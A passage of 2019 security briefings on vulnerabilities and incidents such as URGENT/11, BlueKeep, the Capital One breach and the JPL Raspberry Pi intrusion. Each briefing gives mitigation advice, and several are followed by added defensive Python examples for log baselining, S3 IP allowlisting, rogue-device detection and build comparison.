•    TRON Forum’s ITRON
•    IP Infusion’s ZebOS
•    Wind River’s VxWorks

Attackers can use the URGENT/11 vulnerabilities to control, disrupt and/or modify vulnerable devices.

The URGENT/11 vulnerabilities affect these operating systems through a third-party internet protocol (IP) stack, IPnet. The operating system vendors listed above licensed IPnet from its creator, Interpeak, until 2006, when Wind River bought Interpeak and ceased selling and supporting IPnet separately, instead integrating it into its flagship VxWorks product. Code licensed before that date has lived on in the other operating systems without a vendor behind it.

This situation presents several challenges to organizations and those holding the chief information security officer (CISO) title. First, the URGENT/11 vulnerabilities are not only severe, they can have an incredibly damaging impact in the real world where they allow an attacker to fully control and disrupt healthcare devices (including patient monitors), industrial control systems (including industrial controllers and robots), and SCADA systems responsible for the operation of vital utilities (including water and electricity).  Second, it’s not clear what products may incorporate IPnet — a full list of licensees who have incorporated the IPnet software has not been publicly provided by Wind River. Third, there’s a difficulty in patching/updating the vulnerable devices, as described by URGENT/11-discoverer Ben Seri (VP of Research at Armis Security), who was quoted in Wired Magazine saying, “Often the update mechanism is almost nonexistent or it’s such an analog process it’s almost like it’s with a screwdriver. It’s not something that can be done at scale. So I don’t know if it will ever be accomplished to update all of these machines.”

There is evidence supporting this statement. For example, Becton Dickinson (BD) has not issued an update for its vulnerable Alaris PC Unit. BD states in its product security bulletin, “The Interpeak IPnet standalone TCP/IP networking stack does not currently have a remediation provided by the vendor.” It goes on to discuss compensating controls, without promising any forthcoming code updates.

InGuardians recommends that organizations find the vulnerable devices in their inventory. Armis Security maintains a list of product advisories; a link to it is the first entry in the Additional Resources section below. Armis has also released a detection tool, which endeavors both to identify devices with IPnet network stacks and to discover whether any of the 11 URGENT/11 vulnerabilities is present in those devices. Note: InGuardians has not evaluated this tool and thus cannot confirm the validity of the results it provides, nor what risks are introduced by using, or failing to use, this tool.

Once an organization finds which devices have the URGENT/11 vulnerability, InGuardians recommends updating and/or replacing the vulnerable devices. Organizations should carefully consider whether compensating controls sufficiently mitigate risk.  Given the severity of the consequences, organizations should remember that this decision belongs to the device’s owner; the risk cannot be transferred to the creators of the device’s software.

Additional Resources
“URGENT/11 – Affected Devices” [Armis]

“URGENT/11 detection tool by Armis”[GitHub]

“URGENT/11 Affects Additional RTOSs – Highlights Risk to Medical Devices” [Ben Seri, Armis Blog]

DHS: ICS Medical Advisory (ICSMA-19-274-01)

“Decades-Old Code Is Putting Millions of Critical Devices at Risk” [Wired Magazine]

10/1/19 Emergency out-of-cycle patch from Microsoft - must be manually installed

On Monday, September 23, Microsoft released a rare out-of-band security update to address two vulnerabilities: CVE-2019-1367 in Internet Explorer and CVE-2019-1255 in Windows Defender. The US Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency subsequently issued an alert advising all sectors to patch as soon as possible.

CVE-2019-1367 is a critical flaw in Internet Explorer, versions 9 to 11. The flaw was discovered by Clément Lecigne of the Google Threat Analysis Group. Attackers achieve remote code execution by luring a user to browse a malicious website with a vulnerable browser. The attacker gains the ability to execute code in the context of the user that accessed the malicious web page. Depending on the user’s privilege level, this could allow an attacker to install and run programs, view and modify data, or create new user accounts with full rights and access. Some of these actions may require the user to have privileged access.

CVE-2019-1255 is a less severe flaw which allows for denial of service attacks, triggered by Windows Defender improperly handling files.

Clément Lecigne discovered CVE-2019-1367 was being actively exploited in the wild.  According to Microsoft’s vulnerability notice, the vulnerability is a memory corruption issue, which permits the attacker to execute code in the context of the current user.

CVE-2019-1255 is a file-handling flaw that an attacker could use to prevent users from executing operating system programs.  This would allow the attacker to render the system dysfunctional.  This flaw is considered less severe because it requires the attacker to already have code running on the target machine.  This flaw has not yet been reported to be exploited in the wild.

InGuardians recommends that Microsoft Windows users download and manually install the patch for CVE-2019-1367. As of this writing, the patch is not yet available through Windows Update, Microsoft Update, or Windows Server Update Services (WSUS); it must be downloaded and installed manually. Because of the severity of the flaw and its active exploitation in the wild, both Microsoft and DHS urge that this be done as soon as possible. CVE-2019-1255 will be fixed automatically via the Malware Protection Engine update, but users should verify that the update has completed on their systems.

Additional Resources
CVE-2019-1367 | Scripting Engine Memory Corruption Vulnerability (Microsoft)

“Nine words to ruin your Monday: Emergency Internet Explorer patch amid in-the-wild attacks” (The Register)

“DHS Urges Patch for Two Microsoft Out-of-Band Vulnerabilities” (Health IT Security)

“Microsoft Releases Out-of-Band Security Updates” (CISA – National Cyber Awareness System)

9/23/19 New SD Express memory card brings NVMe speed, but PCIe risk
In 2018, the SD Association ratified v7.0 of its standard, bringing the potential speed of NVMe drives to a new SD card standard by allowing the cards to directly access the computer’s PCIe bus. Called “bus mastering,” this allows the SD card to read and write the computer’s RAM, without the permission or intervention of the computer’s CPU. Recently, the first host controller was developed for these cards.

The standard defines the “SD Express card,” which utilizes the same NVMe technology present in higher-end solid state drives. The highest speed peripheral protocols derive raw speed from communicating directly with a computer or phone’s RAM over a PCIe bus: Firewire cables, Thunderbolt cables and, of course, PCIe cards, including NVMe solid state drives. By eliminating the CPU from the interaction between peripheral and RAM, there’s a decrease in latency and CPU utilization. On the other hand, the CPU can lose the ability to confine the peripheral’s type of interaction with memory.

Lest one believe this is merely theoretical, note that researcher Ulf Frisk has weaponized this functionality with the PCILeech tools. Using either a commodity USB-to-PCIe adapter or a field-programmable gate array (FPGA), a bad actor with access to a computer’s PCIe bus can read and modify the computer’s RAM. Using software like PCILeech, the bad actor can compromise the operating system, modify RAM, or steal data.

No SD Express cards have yet been brought to market, but they’re expected in the next year. These cards could be modified or created to attack a computer, using the same techniques as the current PCILeech-supported devices. There’s increased danger here, as an overwhelming percentage of computers ship with a microSD or SD card slot. These slots are externally and casually accessible to a bad actor.

InGuardians recommends that organizations ensure that policy is already in place to handle the exposure that PCILeech poses: a laptop with a locked screen may not be safe against compromise. If an attacker can reach a PCIe-connected port (SD Express, Thunderbolt, Firewire, or PCIe bus interface), they can read and write to RAM, changing the state of the machine.

InGuardians further recommends that organizations remain vigilant and watch for the release of SD Express cards and of laptops and phones that support this standard. Organizations should develop policies concerning the use of, and protection against, these devices. Particularly sensitive organizations, such as government agencies, should consider physically rendering the ports unusable.

Conducting a security review of all upcoming IT projects is a great way to evaluate the risks that deploying new technology poses to your organization.

Additional Resources

SD and microSD Express Cards 7.1 (SD Alliance Whitepaper)

“Phison Develops PS5017 Controller for SD Express MicroSD Express Cards” (Anandtech)

“Direct Memory Attack the Kernel” (Def Con 24 Talk by Ulf Frisk)

“PCIe Injector Gateway – based on Xilinx Artix7 FPGA and FTDI USB FT601 chip” (Firmware Security Blog)

9/17/19 Local city government defeats ransomware attack.
Years after both Mirai and WannaCry were successful in exploiting Windows SMB vulnerabilities, systems remain unpatched. The original and derivative malware versions are still using the same flaws and default credentials to gain access, particularly for ransomware attacks. The IT staff of the City of New Bedford, Massachusetts identified the presence of the RYUK ransomware on their systems. Criminals demanded $5.3 million. The city counter-offered $400,000, a figure based on the limits of the city’s cyber-insurance policy. When the cyber-criminals declined, the city continued negotiating, buying the IT staff the time needed to bolster defenses and restore files from backups. The city paid no ransom and had no interruption in service.

Derivatives of already-successful malware are increasing in effectiveness and in the ways they are used. They have improved capabilities and altered signatures in order to evade detection. The fact that attackers are still successfully using several-year-old, patchable vulnerabilities reveals the current state of insecurity at many organizations. The failure of companies to patch suggests other gaps in IT security practices and policies.

That is a key distinction: practice vs. policy. Lack of policy will almost ensure that a security function is not done. Having a policy alone does not ensure that it is followed. Specific practices must be devised, be sensible, and be able to be followed without extraordinary or disruptive efforts. Difficult security is too often failed security – it’s not done, done badly, or filled with workarounds and compromise.

The City of New Bedford, Massachusetts found a way to deal with ransomware without paying: shoring up defenses, restoring from backups, and rebuilding systems. “We haven’t seen any interruption in municipal services at all,” said Mayor Mitchell. This approach undoubtedly cost the city far less than even its negotiating position.

The first thing to learn from New Bedford’s case is that the best way to defeat an attacker is not to let them get access to the system.  A well-governed information security program that includes vulnerability management and remediation needs to be implemented and tested.  Your organization’s IT patch management and policies must be effective at identifying vulnerable systems and deploying patches across an organization in a timely way. Applying patches two to three years after their release is not timely, nor cost-effective.

The second critical lesson is that when an organization is compromised, clean backups of systems, software and data are essential to recovery and business continuity. Yet these backups are only a single component of a full defense-in-depth strategy; all is still lost if the root cause is not discovered, eradicated, and monitored for before the restored systems are returned to service.

None of this is new, but evidence shows patching and recovery may not be done as well as one might think. A surge in IoT and SMB attacks has targeted unpatched vulnerabilities in 2019, which highlights the need for diligence.

Review both policy and practice. Do internal checks to verify the current patch state, and follow a new patch through your process. Review and exercise data recovery plans. This does not need to be large scale; pick a system and do a test restore to a clean system.

Practice, because actual data recovery from an EternalBlue ransomware hack should not be your first rodeo.

Additional Resources
“Massachusetts city tells ransomware scumbags to RYUK off, our IT staff will handle this easily” (The Register)

“Attack Landscape H1 2019: IoT, SMB traffic abound” (F-Secure Blog)

“Wielding EternalBlue, Hackers Hit Major US Business” (Information Security Media Group)

9/9/19 Public Metasploit module for BlueKeep released

There is now a public, open source exploit for the BlueKeep vulnerability checked into the Metasploit Framework. Security researchers have long been concerned about the public release and availability of a stable BlueKeep exploit tool that would work against all versions of Microsoft Windows. In initial testing, this release isn’t quite as stable and powerful as the exploit tool originally released by the “Shadowbrokers” group, but it is the first step in that direction. Now that the exploit community has code it can work with, there will be rapid improvements and evolutions of both the exploit and the defenses.

What does this mean for the blue teams at companies around the world?  If your vulnerable systems weren’t being compromised by BlueKeep already, ensure that you are at the current patch level and go hunting for malicious activity.  We will also see better signatures for our perimeter defenses, so be on the lookout for new signatures/rules being added and whether they show the exploit being used against your systems.

The impact of this is twofold: On one side, the release of the exploit module for Metasploit has created an avenue for attackers to more easily attack Windows-based systems. On the other, Metasploit is also used by blue teams at large organizations to test their defenses, and now they have another arrow in the quiver. InGuardians sees the overall impact of the release of the BlueKeep Metasploit module as a positive, in that while it might mean more systems are compromised in the near term, it will also be used to test and validate that systems are patched at corporations and across large networks.

Patch, run, repeat. In Microsoft’s Knowledge Base article on the BlueKeep vulnerability and patch, they rate the exploitability of systems below the current patch level as “1 – Exploitation More Likely”. In addition to staying current on patch levels, stay up to date on the rules/signatures for your perimeter monitoring and defense systems. Apply the latest signatures and look for alerts matching BlueKeep activity. It is important to note that exploit activity for BlueKeep may appear identical to vulnerability scanning for the same flaw. Investigate whether the source of the activity is a valid vulnerability scanner; if not, treat it as hostile and/or compromised.

Going beyond the simple patch fix, network segmentation down to layer 2 with private VLANs and a network vulnerability management program are both good places to start.

Additional Resources
Microsoft advisory and patch for BlueKeep (note: their site needs to be updated now that there is publicly available exploit code).

Ars Technica article on the release of the Metasploit module:

ZDNET article on the Australian Signals Directorate warning about the public release

8/5/19 106 Million People Impacted by Capital One Data Breach
It is alleged that in March of this year, Paige A. Thompson gained access to a number of records belonging to Capital One. The attacker was able to gain access to several of Capital One’s Amazon S3 buckets by abusing a token used by a misconfigured Web Application Firewall (WAF). This provided enough access to enumerate and view information stored in these S3 buckets. After downloading the contents of the S3 buckets (containing several gigabytes of data) the attacker uploaded the stolen information to her personal GitHub page, which was created in her name.

While 106 million people were affected by this breach, only a small percentage of the victims had bank accounts, Social Security Numbers, or Social Insurance Numbers compromised. The largest portion of the compromised data consisted of credit card application data. This breach highlights the need to review access logs and, in particular, account permissions for data hosted in the cloud.

Performing regular reviews of cloud (in this case, AWS) account permissions will reveal gaps between actual account access and business need. InGuardians also strongly recommends that access logs be reviewed on a continual basis. If Capital One had trended regular account access, the spike in usage from this account could likely have been flagged rather quickly. One final control that could have made a difference in both this and similar incidents would be whitelisting access to the S3 bucket, restricting access to only Capital One’s approved IP address range.

In addition to continued log analysis, behavioral models of account activity, usage, and commands executed over time could have revealed potential compromise. Capital One, as part of their investigation, noted that the initial account access to the WAF should never have had the authority to execute the commands used to gain access to the S3 buckets. This activity, in particular, is an illustrative example of a significant deviation from normal operation compared to a known baseline, one that should trigger alerts for further investigation.
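The two controls discussed above, a behavioural baseline of each principal's API activity and an IP allowlist on the bucket, as an added example. This is illustrative code written for this archive, not Capital One's or AWS's own tooling. The event records, the role names (waf-role, etl-role), the bucket name and the 5x spike factor are constructed assumptions; the policy fragment uses the real aws:SourceIp condition key and NotIpAddress operator.

```python
import ipaddress
from collections import Counter, defaultdict

# Constructed events shaped like a subset of CloudTrail fields: the IAM
# principal that made the call and the API action it invoked. Role names
# are assumptions for illustration.
BASELINE_EVENTS = [
    {"principal": "waf-role", "event": "DescribeInstances"},
    {"principal": "waf-role", "event": "DescribeInstances"},
    {"principal": "waf-role", "event": "GetMetricData"},
    {"principal": "etl-role", "event": "GetObject"},
    {"principal": "etl-role", "event": "GetObject"},
    {"principal": "etl-role", "event": "GetObject"},
    {"principal": "etl-role", "event": "ListObjects"},
]
REVIEW_EVENTS = [
    {"principal": "waf-role", "event": "DescribeInstances"},
    {"principal": "waf-role", "event": "ListBuckets"},   # never seen from this role
    {"principal": "waf-role", "event": "GetObject"},     # never seen from this role
    {"principal": "waf-role", "event": "GetObject"},
    {"principal": "etl-role", "event": "ListObjects"},
] + [{"principal": "etl-role", "event": "GetObject"}] * 22   # 3 -> 22: a spike


def profile(events):
    """Behavioural model: principal -> Counter of the API actions it invoked."""
    model = defaultdict(Counter)
    for e in events:
        model[e["principal"]][e["event"]] += 1
    return model


def review_activity(baseline_events, review_events, spike_factor=5, min_count=10):
    """Compare a review window against a baseline window of equal length.

    Flags an action a principal has never performed before ("new_action") and
    an action whose count exceeds spike_factor times its baseline count
    ("volume_spike"; min_count keeps tiny numbers from alerting).
    """
    base = profile(baseline_events)
    seen = profile(review_events)
    findings = []
    for principal, actions in seen.items():
        for action, count in actions.items():
            base_count = base[principal].get(action, 0)
            if base_count == 0:
                findings.append((principal, action, "new_action"))
            elif count >= min_count and count > spike_factor * base_count:
                findings.append((principal, action, "volume_spike"))
    return sorted(findings)


# Constructed bucket policy: deny reads unless the caller comes from the
# organisation's approved egress range (203.0.113.0/24 is a documentation range).
BUCKET_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "DenyReadsFromOutsideApprovedRange",
        "Effect": "Deny",
        "Principal": "*",
        "Action": ["s3:GetObject", "s3:ListBucket"],
        "Resource": ["arn:aws:s3:::example-app-data", "arn:aws:s3:::example-app-data/*"],
        "Condition": {"NotIpAddress": {"aws:SourceIp": ["203.0.113.0/24"]}},
    }],
}


def denied_by_source_ip(policy, caller_ip):
    """True when a Deny statement conditioned on NotIpAddress/aws:SourceIp
    matches the caller. Only that one condition operator is modelled here."""
    ip = ipaddress.ip_address(caller_ip)
    for stmt in policy["Statement"]:
        if stmt.get("Effect") != "Deny":
            continue
        ranges = stmt.get("Condition", {}).get("NotIpAddress", {}).get("aws:SourceIp", [])
        if ranges and not any(ip in ipaddress.ip_network(r) for r in ranges):
            return True
    return False


if __name__ == "__main__":
    for finding in review_activity(BASELINE_EVENTS, REVIEW_EVENTS):
        print("ALERT", *finding)
    for caller in ("203.0.113.40", "198.51.100.7"):
        print(caller, "denied" if denied_by_source_ip(BUCKET_POLICY, caller) else "allowed")
```

With the constructed data, the review flags the WAF role's first-ever ListBuckets and GetObject calls and the ETL role's sevenfold jump in GetObject volume; the policy check shows a caller outside 203.0.113.0/24 being denied even when its credentials would otherwise permit the read.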

Additional Resources
Capital One Data Theft impacts 106 million people

Information on the Capital One Cyber Incident

USA vs Paige Thompson

7/30/19 University Systems Breached Through Known ERP Vulnerability
The US Department of Education states that systems at 62 colleges and universities have been compromised through an improper authentication vulnerability in Ellucian Enterprise Resource Planning (ERP) software. In a technology Security Alert, the Office of Federal Student Aid writes that a vulnerability affecting certain versions of Ellucian Banner Web Tailor and Banner Enterprise Identity Services has been exploited at the schools to create thousands of fake student accounts, some of which have been used to conduct criminal activity. The vulnerability was first detected late last year, and Ellucian developed and released a patch several months ago.

The flaw was detected in December 2018, and the patch was released in May 2019, which is often a busy time for colleges. Coupling this timing with a CVSSv3 rating of 8.1 (high, but not critical) likely made it harder for campus information security departments to insist the patch be applied rapidly. It is likely that this vulnerability has been used to compromise many universities and colleges around the world. Given that fake accounts from this exploit have already been detected committing crimes, the overall impact will continue to grow in the coming weeks.

InGuardians recommends that institutions of higher education apply patches to any Ellucian ERP systems. Additionally, particularly given Ellucian’s claims that admission portals are being exploited by botnets, InGuardians recommends that institutions add reCAPTCHA capabilities to those portals, which could greatly hinder that activity, particularly with this vulnerability.

In addition to patching and adding reCAPTCHA functionality to your portals, InGuardians recommends verifying valid accounts and checking application logs for signs of compromise. If you use Ellucian software, now is a good time to be actively hunting your network for signs of compromise, regardless of whether you had patched before this most recent announcement.

Additional Resources
“Ellucian systems compromised at 62 universities, Education Dept. says” (EdScoop)

“Hackers breach 62 US colleges by exploiting ERP vulnerability” (ZDNet)

“Over 60 US Colleges Compromised by ERP Exploit” (InfoSecurity Magazine)

“Exploitation of Ellucian Banner System Vulnerability” (US Department of Education and Federal Student Aid)

“Banner Web Tailor and Banner Enterprise Identity Services Vulnerability Disclosure” (Joshua Milliken)

CVE-2019-8978 Detail (NIST)

7/1/19 Rogue Raspberry PI used to steal NASA’s secrets
NASA’s Office of Inspector General has revealed a nearly year-long compromise by an advanced persistent threat (APT) group of NASA’s Jet Propulsion Lab (JPL). The APT bad actor accomplished this by placing a single-board Raspberry Pi computer onto JPL’s network. Because JPL had little to no segmentation on their network, a single network endpoint was able to steal and exfiltrate valuable and regulated information.

The larger issue at hand is that an insider threat deployed a rogue device on the network and used it to steal sensitive information.

The bad actor gained access to quite a bit of information, including plans for Mars missions being managed by JPL. Some of the information is illegal to export from the United States, under the International Traffic in Arms (ITAR) regulations.

The larger impact is potentially severe, as most organizations are not prepared to identify and isolate a rogue device on their internal networks.

Information security practitioners both inside and outside companies strongly push for network segmentation, which is critical to containing or even avoiding attacks like this one. In the process of building networks, however, companies generally deploy full connectivity from every single computer to every other, whether or not that connectivity is required by the business. For example, in many companies a publicly accessible machine in the lobby can reach the machines holding the most valuable intellectual property or controlling the most critical business information.

Private VLANs are one of many options available to aid in network segmentation.  The theory behind this is to create private VLANs on switches for each workstation, and promiscuous private VLANs for the servers.  This allows workstations to communicate with servers, but not with each other.

InGuardians also recommends regular sweeps of networks and office spaces. During these sweeps, physical and network spaces are actively scanned in an attempt to identify all network-connected devices. In addition to sweeps, InGuardians recommends using network monitoring tools to identify new machines connected to the network. Zeek (formerly Bro), arpwatch and many other correlation engines will keep a running log of all new machines that join the network.
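An added example of the monitoring recommended above: an inventory check over arpwatch-style "new station" and "changed ethernet address" messages that flags any MAC address not in the asset list. This is illustrative code, not part of the original briefing, arpwatch or Zeek; the log lines, the inventory, the hostnames and the small OUI table are constructed. Zeek's connection or DHCP logs could feed the same check.

```python
import re

# Constructed lines in the shape of arpwatch's syslog messages, with one
# unrelated line to show the parser ignores it. Addresses, hostnames and
# interface names are assumptions for illustration.
LOG_LINES = [
    "Jun 10 08:01:12 sw-core arpwatch: new station 10.20.1.15 00:50:56:aa:bb:01 eth0",
    "Jun 10 08:02:40 sw-core arpwatch: new station 10.20.1.77 b8:27:eb:4c:2d:19 eth0",
    "Jun 10 08:03:05 sw-core arpwatch: changed ethernet address 10.20.1.15 00:50:56:aa:bb:02 (00:50:56:aa:bb:01) eth0",
    "Jun 10 08:04:00 sw-core sshd[812]: Accepted publickey for ops from 10.20.1.9 port 51022",
    "Jun 10 08:05:22 sw-core arpwatch: new station 10.20.2.5 3c:22:fb:11:22:33 eth1",
]

# Constructed asset inventory: MAC -> owner/description. Anything absent
# from it is unexplained until someone claims it.
INVENTORY = {
    "00:50:56:aa:bb:01": "vmhost-01, approved 2019-02",
    "3c:22:fb:11:22:33": "printer-2f, approved 2018-11",
}

# Tiny OUI table (first three octets -> vendor) used to enrich alerts.
# Constructed subset; a real deployment would load the IEEE registry.
OUI_HINTS = {
    "b8:27:eb": "Raspberry Pi Foundation",
    "00:50:56": "VMware",
}

ARPWATCH_RE = re.compile(
    r"arpwatch: (new station|changed ethernet address) "
    r"(?P<ip>\S+) (?P<mac>\S+)(?: \((?P<old>\S+)\))?(?: (?P<iface>\S+))?$"
)


def parse_arpwatch(line):
    """Return a dict for arpwatch station events, or None for any other line."""
    m = ARPWATCH_RE.search(line)
    if not m:
        return None
    kind = "new" if m.group(1) == "new station" else "changed"
    return {"kind": kind, "ip": m.group("ip"), "mac": m.group("mac").lower(),
            "old_mac": (m.group("old") or "").lower(), "iface": m.group("iface")}


def vendor_hint(mac):
    """Vendor name for the MAC's OUI, or an empty string when unknown."""
    return OUI_HINTS.get(mac[:8], "")


def review_stations(lines, inventory):
    """Flag stations whose MAC is not in the inventory.

    Returns (ip, mac, reason, vendor_hint) tuples in log order. A known IP
    that suddenly answers from an unknown MAC is reported separately, since
    that is how a device plugged into an existing drop tends to show up.
    """
    findings = []
    for line in lines:
        ev = parse_arpwatch(line)
        if ev is None or ev["mac"] in inventory:
            continue
        reason = "unknown_station" if ev["kind"] == "new" else "address_changed_to_unknown"
        findings.append((ev["ip"], ev["mac"], reason, vendor_hint(ev["mac"])))
    return findings


if __name__ == "__main__":
    for ip, mac, reason, hint in review_stations(LOG_LINES, INVENTORY):
        print(f"ALERT {reason}: {ip} {mac} {hint}".rstrip())
```

The two alerts the constructed data produces are the interesting cases: a brand-new station with a Raspberry Pi OUI, and a known address that started answering from a MAC nobody has registered. The approved printer and virtualization host generate nothing.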

Additional Resources
NASA hacked because of unauthorized Raspberry Pi Connected to its Network

NASA OIG final report on Cyber Security

Configuring private VLANS on Cisco Switches

Zeek, formerly bro-ids, network monitoring utility:

5/14/19 Microsoft patches serious Remote Desktop Services Vulnerability
Microsoft released a security update that patches a remote code execution vulnerability in Remote Desktop Services (formerly Terminal Services) on a number of platforms. The list of affected in-support Windows versions includes Windows 7, Windows Server 2008 R2, and Windows Server 2008. The vulnerability is pre-authentication, which led Microsoft to announce that the flaw was wormable.

A remote code execution exploit against a service that is often exposed, coupled with the fact that it is pre-authentication, makes the potential severity and impact of this flaw high.

According to Microsoft’s advisory, Windows 8 and Windows 10 users are not affected by this vulnerability. Due to the severity of the vulnerability, Microsoft has issued patches for both Windows XP and Server 2003, which are no longer actively supported.

The top thing you can do is apply the latest updates for your Microsoft systems. Enabling Network Level Authentication (NLA) reduces the risk from an unauthenticated attacker, but still leaves the machine vulnerable.

The patches that fix the Remote Desktop Services vulnerability (CVE-2019-0708) can be found here:

Microsoft customers that are in-support and have automatic updates turned on should already be patched.  Patch verification through your vulnerability management program is recommended.

Additional Resources
Microsoft Advisory for the Remote Desktop Services vulnerability (CVE-2019-0708):

Microsoft Security Updates for Remote Desktop Services vulnerability (CVE-2019-0708):

5/1/19 Supply chain attack targets video game developers

Researchers from Kaspersky and ESET have identified evidence that the same attackers that compromised ASUS with a supply chain attack have also compromised at least three video game companies.  Supply chain attacks target the manufacturers of hardware and software upstream of the final victim company.

In order to compromise ASUS the attackers managed to subvert the ASUS software update service.  Undiscovered for over five months, this allowed attackers to compromise thousands of ASUS customer systems.

In the case of the compromised game companies, attackers targeted Microsoft Visual Studio, uploading malware into the developers’ build environment and ultimately gaining the ability to add their own malicious code to production software. This in turn gave the attackers the ability to backdoor the games installed on thousands of unsuspecting customers’ systems.

The impact of the compromised games should be low to medium to our clients.  This is mainly because most businesses do not allow games to be loaded on to their desktops and laptops.  Two of the three game companies have been identified as Electronics Extreme and Zepetto.  Given that these two companies are based in Asia, it is not surprising that the majority of infected systems are located there.  Kaspersky and ESET have said they have identified almost 100k infected systems.

The impact of supply chain attacks, however, is immense, because in this case the attackers compromised Microsoft Visual Studio. This should be a reminder for everyone in infosec to re-read “Reflections on Trusting Trust” by Ken Thompson. Ken described a devastating attack chain originally discovered by Paul Karger and Roger Schell in 1974: the compromise of a binary compiler, so that every program it compiled was malicious.

To wrap up, the impact of successful supply chain attacks is severe.  If the supply chain attack compromises a compiler or an update service, all downstream users will be compromised.

InGuardians recommends conducting a supply chain security analysis. This will provide your organization with a threat landscape for the elements of your supply chain. The difficult aspect is that downstream companies usually have little visibility into the source code or hardware they purchase. An important part of the QA and build process should be to ensure that no “additional” functionality or code goes into your end product.
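One concrete form of the build-process check described above, as an added example (not code from the briefing, Kaspersky, ESET or any affected vendor): build the same source on two independently administered machines and compare the artifacts file by file, so that any file that differs, or exists in only one build, has to be explained before release. The same comparison is the core of the diverse double-compiling approach the “Countering Trusting Trust” resource below discusses. The sample build trees, paths and file names are constructed in a temporary directory for demonstration.

```python
import hashlib
import os
import tempfile


def hash_tree(root):
    """Relative path -> SHA-256 hex digest for every regular file under root."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            h = hashlib.sha256()
            with open(full, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    h.update(chunk)
            digests[rel] = h.hexdigest()
    return digests


def compare_builds(build_a, build_b):
    """Report files present in only one build and files whose content differs."""
    a, b = hash_tree(build_a), hash_tree(build_b)
    return {
        "only_in_a": sorted(set(a) - set(b)),
        "only_in_b": sorted(set(b) - set(a)),
        "differs": sorted(p for p in set(a) & set(b) if a[p] != b[p]),
    }


def build_is_clean(report):
    """True only when the two builds are byte-for-byte identical."""
    return not any(report.values())


def make_sample_builds():
    """Construct two build outputs under a temp dir for demonstration: the
    launcher matches, the game binary differs, and a DLL exists only in the
    second build. Returns the two build directories."""
    root = tempfile.mkdtemp(prefix="double-build-")
    a = os.path.join(root, "build_vendor_ci")
    b = os.path.join(root, "build_independent")
    files_a = {
        "bin/launcher.exe": b"LAUNCHER v1.0",
        "bin/game.exe": b"GAME v1.0",
    }
    files_b = {
        "bin/launcher.exe": b"LAUNCHER v1.0",
        "bin/game.exe": b"GAME v1.0 + bytes nobody can account for",
        "bin/helper.dll": b"HELPER",
    }
    for base, files in ((a, files_a), (b, files_b)):
        for rel, data in files.items():
            path = os.path.join(base, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(data)
    return a, b


if __name__ == "__main__":
    build_a, build_b = make_sample_builds()
    report = compare_builds(build_a, build_b)
    print("clean" if build_is_clean(report) else f"NOT clean: {report}")
```

The check only works when the build is reproducible (fixed timestamps, pinned toolchain and dependencies); a build that differs on every run hides exactly the kind of injected difference this is meant to surface, so making the build deterministic is the prerequisite, not an afterthought.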

Additionally, this becomes an opportune time to audit and revise B2B and other contract language to include the need for security requirements from suppliers.  This language could include the requirement to conduct and share the results of recent security assessments and code audits under non-disclosure agreements.

Additional Resources
Supply Chain Hackers Snuck Malware Into Videogames

Hackers Hijacked ASUS Software Updates to Install Backdoors on Thousands of Computers

Reflections on Trusting Trust by Ken Thompson

Countering “Trusting Trust” by Bruce Schneier

InGuardians Events & Resources

Upcoming Webinars
“RED TEAM PRIMER FOR EXECUTIVES” with InGuardians Offensive Security Team
May 30, 12 PM PDT / 3 PM EDT

Join Mike Poor as he moderates this roundtable discussion with members of the InGuardians Offensive Services Team.  This webinar will discuss red team penetration test definitions, what clients should be considering when preparing for one, and what to expect to learn from the results.  If you have questions that you would like answered on the webinar, contact us via email ( or ask us on Twitter (@inguardians).

Register here:

For all upcoming webinars, please visit:

Upcoming Classes

Instructor: Justin Searle, Director of ICS Security, InGuardians, SANS Certified Instructor

SANS Security West | San Diego | May 9 – May 13 2019

Instructor: Larry Pesce, Director of Research, InGuardians, SANS Certified Instructor

Amsterdam, Netherlands | May 20 – May 25, 2019

4/2/19 Critical Flaw in Rockwell Automation Hardware Allows for DoS of Popular ICS Component

Researchers have discovered a vulnerability in version 5.001 of the software for Rockwell’s PowerFlex 525 drive component. This drive component is flexible in the number of roles it can perform and sees use in a number of industrial applications, from conveyors to fan and pump controls. The vulnerability, CVE-2018-19282, was first disclosed to Rockwell by researchers at Applied Risk in June 2018. It allows an attacker to send a crafted flow of packets that crashes the Common Industrial Protocol (CIP) network stack on the system. Interestingly, when executed, this attack locks out all other connections while allowing the attacker to maintain a connection through which traffic can continue to flow. The only method to clear the state is a hard power reset of the drive.

An attack of this nature poses a real threat to both the Availability and the Integrity segments of the CIA triad, which lies at the heart of most security designs. This type of attack is particularly dangerous for ICS systems, which typically place emphasis on the availability portion of the triad, as opposed to conventional IT, which tends to favor confidentiality as the primary segment.

As with most serious ICS-focused vulnerabilities, this one has the potential to cross from the digital landscape into the kinetic landscape by giving the attacker the ability to alter the functioning of the drives and potentially cause physical harm to the systems they ostensibly control.

The ability to change the functioning state of devices designed to govern cooling or air flow to whatever state an attacker desires, coupled with the inability of legitimate operators to connect to the device, increases the risk of the vulnerability.

Fortunately, Rockwell has released a patch for affected software.  However, it should also be noted that other manufacturers also released a number of security advisories over the last week for a range of products.  This is an indication of the increased awareness on their part of the growing threat landscape affecting such systems.

For Non-ICS systems, this should serve as another reminder that in today’s growing Internet of Things, there are likely devices attached to your networks that lay somewhere in-between conventional IT resources and ICS resources.  Knowing that those devices are present and ensuring that those devices are patched are two challenging pieces of a growing puzzle that is managing modern computing environments.

As the number of attractive ICS targets increases, and as attempts to develop the capability to impact the physical world from compromised digital systems also increase, it becomes increasingly important for organizations to maintain strict discipline with regard to patching systems. This is especially relevant for ICS systems, which have not always been rigorously patched.

Organizations which use the affected Rockwell systems should patch them immediately, if they have not already done so.

In addition, controlling the flow of TCP and UDP traffic on ports 2222 and 44818 (the key ports used by this Rockwell system) by restricting the sources that can access the devices can help to mitigate the attack vector.
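An added example covering both this recommendation and the BlueKeep briefing above: a review of flow records that flags connections to the sensitive ports named on this page (RDP on 3389; EtherNet/IP on TCP/UDP 2222 and 44818) from any source not on an approved list, which is the question of whether a probe came from a sanctioned vulnerability scanner or an engineering workstation rather than something hostile. This is illustrative code, not from the briefing, Rockwell or Microsoft; the flow records, the scanner address and the workstation subnet are constructed.

```python
import ipaddress
from collections import defaultdict

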